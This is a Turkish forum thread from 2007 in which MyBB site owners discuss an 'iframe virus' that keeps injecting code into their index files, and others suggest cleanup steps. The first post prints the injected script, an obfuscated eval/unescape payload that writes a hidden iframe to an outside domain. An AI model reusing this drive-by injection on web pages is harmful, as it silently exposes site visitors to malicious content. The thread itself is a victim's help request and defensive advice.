Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 1301
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Formlarda yazılanlar ekra..
(4262 okuma, 0 yanıt)
 MyBB 1.2 Kurulum(Resimli ..
(6742 okuma, 1 yanıt)
 mybb kurulum hatası..
(5799 okuma, 1 yanıt)
 Mybb -> BBtonuke Dönüş..
(5467 okuma, 1 yanıt)
 bu sorun cikariyor bana..
(5900 okuma, 2 yanıt)
 MyBB Son Sürüm..
(9763 okuma, 6 yanıt)
 MYBB Seo l Site Maps l Me..
(7300 okuma, 4 yanıt)
 MyBB 1.4 Forum Türkçe Yam..
(8664 okuma, 5 yanıt)
 Cracker Tracker 1.07{MyBB..
(6972 okuma, 2 yanıt)
 PHP Nukeye Mybb Entegre E..
(19340 okuma, 18 yanıt)
 Mybb Kurulumu..
(4610 okuma, 0 yanıt)
 MyBB 1.4.1 Tam Türkçe Kur..
(4837 okuma, 0 yanıt)
 mybb forumum google seo l..
(5553 okuma, 1 yanıt)
 Php Nukeye Mybb Entegresi..
(9201 okuma, 6 yanıt)
 overview linkleri yeni sa..
(4933 okuma, 0 yanıt)
 mybb siteyi sol tarafa ya..
(4893 okuma, 0 yanıt)
 Postbit Menü MybbTurkiye ..
(6630 okuma, 1 yanıt)
 MyBB hata Türkçe Karakter..
(4887 okuma, 0 yanıt)
 Mybb Super Flv Player Myc..
(5041 okuma, 0 yanıt)
 Youtube MyKod (Plugin&..
(10144 okuma, 8 yanıt)
 mybb database sorunu..
(5471 okuma, 0 yanıt)
 lycos ta mybb kurdum ufak..
(5930 okuma, 1 yanıt)
 iframe virüsü kurtuluşu ?..
(11404 okuma, 8 yanıt)
 .htaccess yazabilcek arka..
(4744 okuma, 0 yanıt)
 Mk Portal'ın MyBB'ye Kuru..
(6682 okuma, 1 yanıt)
 MyBB-Wodrpress Entegresi..
(9247 okuma, 5 yanıt)
 YBFrss Otomatik Sitemap(l..
(9352 okuma, 5 yanıt)
 Anasayfada Son Konu yazar..
(5160 okuma, 0 yanıt)
 MyBB SEO 1.0 Beta 9..
(4773 okuma, 0 yanıt)
 Hoşgeldiniz Paneli..
(5296 okuma, 0 yanıt)
 Overview 3.0.4..
(5249 okuma, 0 yanıt)
 Forumların Başına İcon Ek..
(5791 okuma, 0 yanıt)
 Hızlı Kayıt Ol Eklentisi..
(4962 okuma, 0 yanıt)
 SeoArsiv Mod..
(5136 okuma, 0 yanıt)
 MyBB Güvenliğini Arttıral..
(6965 okuma, 2 yanıt)
 Sitenize Duyuru Panosu..
(7265 okuma, 2 yanıt)
 php-nuke'den myBB'ye..
(16377 okuma, 16 yanıt)
 mybb forum admin paneline..
(6563 okuma, 1 yanıt)
 YBf Artık Mybb Olarak Onl..
(9894 okuma, 7 yanıt)
 aktivasyon linki ve alt f..
(6570 okuma, 2 yanıt)
 Sitede üye olunamıyor !..
(11128 okuma, 7 yanıt)
 mybbde tema ve dil yükle..
(7402 okuma, 3 yanıt)
 Hide Hack 1.2..
(6862 okuma, 2 yanıt)
 CGC AyYıldız Teması V4..
(8815 okuma, 3 yanıt)
 myBB Türkçe 1.2x Çeviri 3..
(6306 okuma, 1 yanıt)
 EfixClub TRed Theme..
(6282 okuma, 1 yanıt)
 1.20 Moderatör Bloğu &..
(8230 okuma, 3 yanıt)
 Fenerbahçe Teması[MyBB 1...
(15066 okuma, 12 yanıt)
 MyBB 1.2.1 Güvenlik Günce..
(8431 okuma, 4 yanıt)
 MyBB MTR Paket v4..
(5837 okuma, 1 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - i f r a m e virüsü kurtuluşu ?
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


i f r a m e virüsü kurtuluşu ?

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-02, 17:16:41    Mesaj konusu: i f r a m e virüsü kurtuluşu ? Alıntıyla Cevap Gönder

merhabalar

ikidebir siteme böle kod ekleniyor. avaba kendi kendinemi ekliyo. birisimi ekliyo. bıktım düzeltmekten.
Forumum mybb
admin/index.php dosyasına ce
index.php
dosyalarına ekleniyor. site curcuna gözüküor. o zaman. bozuk şeklinde oluyor.

Kod:
echo "<body id=\"logo\"><script>e v a l(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%6 5%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%65%63%32% 31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%74%6f%6d%61%6b%61%79%61%6e%2e%62 %69%7a%2f%69%6e%64%65%78%2e%70%68%70%3f%6f%75%74%3d%31%31%39%30%32%33%38%37%33%3 2%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%2a%32%32%33%34%34%36%29%2b%27%35%65%37%33%31%39%5c%27%20%77%69%64%74%68%3d%36 %36%39%20%68%65%69%67%68%74%3d%33%33%34%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6 c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>\n";


En son mechulsun tarafından 2007-10-05, 03:50:16 tarihinde değiştirildi, toplam 1 kere değiştirildi
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-21, 11:41:21    Mesaj konusu: Forum Arası Reklamlar


Başa dön
nofel
Mesaj: 500+
Mesaj: 500+





Kayıt: Apr 25, 2005
Mesajlar: 655

MesajTarih: 2007-10-02, 19:43:02    Mesaj konusu: Alıntıyla Cevap Gönder

bu sitelere bulaşan i f r a m e virüsü olmasın sakın Very Happy

dikkatli olmak lazım Very Happy

kurtul bi an önce derim Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-03, 08:22:28    Mesaj konusu: Alıntıyla Cevap Gönder

ya ben dosyanın yenisini atıyorum. yine bulaşıyo. mybbnin bütün dosyalarına attım. düzeliyor. sonra ine böle oluyo.
ve sitemi indirdim. tarama yaptırdım hiçbişey yok ama hala bu kod ekleniyo oraya delirdim artık Sad(((8
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
durdu
Mesaj: 50+
Mesaj: 50+





Kayıt: Jun 19, 2006
Mesajlar: 82
Konum: Giresun/Ordu.arasi

MesajTarih: 2007-10-03, 14:11:43    Mesaj konusu: Alıntıyla Cevap Gönder

off off kardeş o sorun bendede var .sorunu cöze bilirsen buraya yaz bizde bilgirenek

20 gündür uğlaşim Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
mechulsun
Mesaj: 50+
Mesaj: 50+





Kayıt: Mar 19, 2007
Mesajlar: 52

MesajTarih: 2007-10-05, 03:48:45    Mesaj konusu: Re: bu kod ne oluyor Alıntıyla Cevap Gönder

Arkadaşlar Ben Sorunu Buldum. Bulaşanlara Bilgi Amaçlı olsun diye Yardımcı olayım.

Bu Kod İframe Virüsü oluyormuş. O Virüs pcden ftp programı yoluyla ulaşmıştır.... Bütün İndex.php veya İndex.html Dosyalarına Yerleşmektedir. Yapmamız Gereken ise o virüslü kodu siliniz. Yenisi Varsa Upload ediniz...

Sonra Pcye Format atınız bence.
Format atar atmaz ftp şifresini değiştiriniz...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 07:39:02    Mesaj konusu: Alıntıyla Cevap Gönder

1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2007-10-05, 10:17:59    Mesaj konusu: Alıntıyla Cevap Gönder

PhP_CoDeR :
1- Sadece indexlere bulaşmıyor,
2- Index yada bulaştığı dosyayı değiştirmek çözüm değil,
3- PC ye format atmak da önemli değil,
4- FTP Şifresi de sorun olmaz...

Daha önce bu konuda epey bilgi vermiştim... Geçmiş mesajlara bakarsanız, daha detaylı bilgilere ulaşabilirsiniz.


http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32224&highlight=

http://eski.netopsiyon.com/modules.php?name=Forums&file=viewtopic&t=32671&highlight=


gelişimi...
1. sitenizde açık bulunan bir modül aracılığı ile sitenize .dosya.php .dosya.html gibi bir dosya atıyor bu dosya bir çeşit ftp aracı özelliği taşıyor...
2. yüklenen dosya ile dilediği yere yazdırıp çizdirip değer değiştirip yenilikler yapılabiliyor...
3. bunu yemişseniz ne yaparsanız yapın kurtuluşunuz yok...

çözüm...

1. şüphelendiğiniz modülleri siliniz
2. kodu yiyen dosyaları yenileri ile değiştirip ftp şifrenizi değiştiriniz...
3. şüpheli modüller sırası ile: fıkra, şiir, My_eGallery, coppermine, Köşe_Yazıları (alt sürümleri 4.3-2 alt sürümleri) Card, Site_Messenger 1.4 den alt sürümleri, son olarak shoutbox 8.5 alt sürümleri...

Not: youtube ve benzeri modüller bu kategori içinde yer alabilirler...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
PhP_CoDeR
Mesaj: 200+
Mesaj: 200+





Kayıt: Oct 28, 2003
Mesajlar: 299

MesajTarih: 2007-10-05, 13:43:31    Mesaj konusu: Alıntıyla Cevap Gönder

Bunun tek çaresi ya virüsü bulup sileceksiniz ki virüsü ayırt etmek bayağı bir zor. Genellikle cpanel kullanan kişilerde mail klasörüne yerleşiyor. mail klasörünü komple bilgisayarınıza indirin nortonun en güncel hali ile tarayın size tavsiyem... Eğer virüsü bulursa, hangi klasörde olduğuna bakın, ftp den o dosyayı silin. Virüs temizlenmiş olacaktır. Defalarca bu yöntemle birçok kişiyi virüsten kurtardım.

İkincisi ise, virüsü bulamadığınız takdirde, tek çareniz hostu silmeniz ve tekrar oluşturmanız. Bunun için tüm yedeklerinizi alın, host yetkilisine hesabınızı silip tekrar oluşturmasını iletin. Yeni hesabınız oluşturulduğunda tüm dosyalarınızı (tabi tekrar antivirüs ile taramanızda fayda var...) siteye yükleyin. Bunu da deneyen arkadaşlarım olumlu sonuç aldılar.

Not: Unutmayın ki eklediği kodları silmek asla kalıcı çözüm değildir. Virüsü siteden atmadıkça o her zaman zararlarını gösterecektir.

Kolay gelsin...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-11-21, 11:41:21    Mesaj konusu: Forum Arası Reklamlar


Başa dön
ultrAslanYavuz
Tema Sorumlusu
Tema Sorumlusu





Kayıt: Jun 25, 2006
Mesajlar: 1217

MesajTarih: 2007-10-05, 13:50:36    Mesaj konusu: Alıntıyla Cevap Gönder

codere katılıyorum. benim basıma gelmişti.mail klasöründeydi virüs ve silinmiyordu.yedekelri aldım ve hostu sıfırlattırdım. sonra tekrar siteyi attım sorun yok.bu arada şifreleri değişmede fayda var.ben ftp yi bi arkadaşımla beraber kullanıyordum.o diyordu benim bilgisayarda virüs olmaz vs. en sonunda dedim kaspersky in son sürümünü indir ve bilgisayarı virüs dolu cıktı.yani anlayacagınız hatayı illaki kendinizde aramayınız.en iyi yol bence yedeklerinizi alın virüsten ayırın daha sonraşifrenizi değiştirin ve tekrar atın.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> MyBB Forumu Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Foruma iframe Kodları Calısmıyor cuneytsonmez NukeBB Eklentileri 4 2010-05-22, 00:49:02 Son Mesajı Görüntüle
Yeni mesaj yok Forumda iframe kullanmak Vizyon Php Nuke Sorunlarınız 4 2010-01-03, 19:44:43 Son Mesajı Görüntüle
Yeni mesaj yok Iframe de download sorunu AndersNystrom Php Nuke Sorunlarınız 0 2009-09-29, 16:38:15 Son Mesajı Görüntüle
Yeni mesaj yok Block iframe canpolat03 Php Nuke Sorunlarınız 3 2009-09-20, 22:24:53 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright